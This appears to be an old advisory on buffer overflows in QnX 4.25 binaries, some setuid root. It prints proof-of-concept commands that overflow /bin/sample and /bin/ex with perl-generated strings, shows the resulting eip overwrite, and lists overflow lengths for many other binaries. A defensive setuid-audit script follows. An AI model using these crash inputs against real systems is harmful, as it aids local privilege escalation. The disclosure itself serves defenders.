COMMAND

    QnX multiple bof in suid/no suid files

SYSTEMS AFFECTED

    QnX OS 4.25

PROBLEM

    Egor Egorov found the following binaries to be vulnerable to buffer
    overflows:

    /bin/sample

    Example:
    =========

        # cd /bin
        # ls -l sample
        -rwsrwxr-x 1 root root 20639 Jan 19 1996 sample
        # sample `perl -e 'print "A" x 280'`
        Profile based upon 2000 samples/second.
        //1/bin/sample terminated (SIGSEGV) at 0005:00000041
        %1 672 Memory fault sample $(perl -e 'print "A" x 280')
        # wd sample `perl -e 'print "A" x 280'`
        ebp: 41414141 eip: 00000041
        # wd sample `perl -e 'print "A" x 280, "B"'`
        ebp: 41414141 eip: 00004241

    /bin/ex

    Example:
    =========

        # wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
        ebp: 00000041 eip: 646f6f67 - doog

    And also:

        file            bytes for bof
        /bin/du       - 558
        /bin/find     - 799
        /bin/lex      - 1673
        /bin/mkdir    - 517
        /bin/rm       - 351
        /bin/serserv  - 224
        /bin/tcpserv  - 146
        /bin/termdef  - 729
        /bin/time     - 2489
        /bin/unzip    - 299
        /bin/use      - 1964
        /bin/wcc      - 138
        /bin/wcc386   - 137
        /bin/wd       -
        /bin/wdisasm  - 135
        /bin/which    - 304
        /bin/wlib     - 256
        /bin/wlink    - 10244
        /bin/wpp      - 256
        /bin/wpp386   - 256
        /bin/wprof    - 141
        /bin/write    - 157
        /bin/wstrip   - 817

SOLUTION

    Update ?
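An added example, not part of the original advisory: the title separates suid from non-suid files, and /bin/sample is listed setuid root, so a useful first check is which of the named binaries actually carry the setuid or setgid bit on a given system. The script is plain POSIX sh; the function names `audit_affected` and `count_privileged` and the `AUDIT_ROOT` variable are hypothetical, and only the path list comes from the advisory.

```shell
#!/bin/sh
# Added example (not from the advisory): report which of the listed binaries
# are setuid/setgid. Read-only; it changes no permissions.

# Path list copied from the advisory text.
AFFECTED="/bin/sample /bin/ex /bin/du /bin/find /bin/lex /bin/mkdir /bin/rm
/bin/serserv /bin/tcpserv /bin/termdef /bin/time /bin/unzip /bin/use /bin/wcc
/bin/wcc386 /bin/wd /bin/wdisasm /bin/which /bin/wlib /bin/wlink /bin/wpp
/bin/wpp386 /bin/wprof /bin/write /bin/wstrip"

# audit_affected [ROOT]
# ROOT is an optional prefix (hypothetical parameter), e.g. the mount point of
# a disk image; empty means the live filesystem.
# Prints "SUID  <path>", "SGID  <path>" or "plain <path>" for each file found.
audit_affected() {
    root=${1:-}
    for p in $AFFECTED; do
        f="$root$p"
        [ -f "$f" ] || continue          # not installed here: skip
        if [ -u "$f" ]; then
            echo "SUID  $p"
        elif [ -g "$f" ]; then
            echo "SGID  $p"
        else
            echo "plain $p"
        fi
    done
}

# count_privileged [ROOT]
# Number of listed binaries that have the setuid or setgid bit set.
count_privileged() {
    audit_affected "${1:-}" | awk '/^(SUID|SGID)/ { n++ } END { print n + 0 }'
}

# Stand-alone run: audit the live system, or the tree named by AUDIT_ROOT.
audit_affected "${AUDIT_ROOT:-}"
```

Entries reported as SUID or SGID are the ones to review first, for example with `ls -l` to confirm the owner.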